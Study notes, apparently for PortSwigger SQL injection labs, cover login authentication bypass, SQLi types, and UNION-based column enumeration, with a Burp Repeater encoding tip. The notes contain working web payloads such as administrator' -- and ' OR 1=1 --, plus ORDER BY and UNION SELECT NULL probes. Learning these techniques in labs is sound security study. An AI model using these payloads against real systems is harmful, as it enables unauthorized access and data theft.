PSG SQL

Note : If inside `burp repeater` , remember to `CTRL + U` to format the `payload`

`' order by 1 --`

`will become`

`'+order+by+1+--`

Vuln code

`SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'`

Crafting

SELECT * FROM users WHERE username = 'administrator' --' AND password = 'bluecheese'

SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'bluecheese'

Exploit Delivery

administrator' --
' OR 1=1 --

Type of SQL injections

inband SQLi : you get response aka normal sqli
inferential SQLi : you don't get response aka blind sqli
Out-of-band-SQLi : your use a Server as man in middle send back the response to u

UNION attack to retreive data from other table

Vuln code

select * from categoryTable where category='Coporate Gifts'

select * from categoryTable where category='Coporate Gifts'

Determine number of columns

' order by 1 -- 
' order by 2 --

Combine order by with select query

select * from categoryTable where category='' order by 1 --anything here gets ignored

UNION SELECT can be used to double check the number of columns

' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL-- 
' UNION SELECT NULL,NULL,NULL--

Ensure same Data type

'a' , 'a'
123 , 'a123'

characters?
alphanumeric?
numbers?

PreviousSQL NextSQL Database Uses

Last updated 2 years ago

hashtagBasic SQL Login Auth bypass

hashtagNote : If inside burp repeater , remember to CTRL + U to format the payload

hashtag' order by 1 --

hashtagwill become

hashtag '+order+by+1+--

hashtagVuln code

hashtagType of SQL injections

hashtagUNION attack to retreive data from other table

hashtagVuln code

hashtagDetermine number of columns

hashtagEnsure same Data type

Basic SQL Login Auth bypass

Note : If inside `burp repeater` , remember to `CTRL + U` to format the `payload`

`' order by 1 --`

`will become`

`'+order+by+1+--`

Vuln code

Type of SQL injections

UNION attack to retreive data from other table

Vuln code

Determine number of columns

Ensure same Data type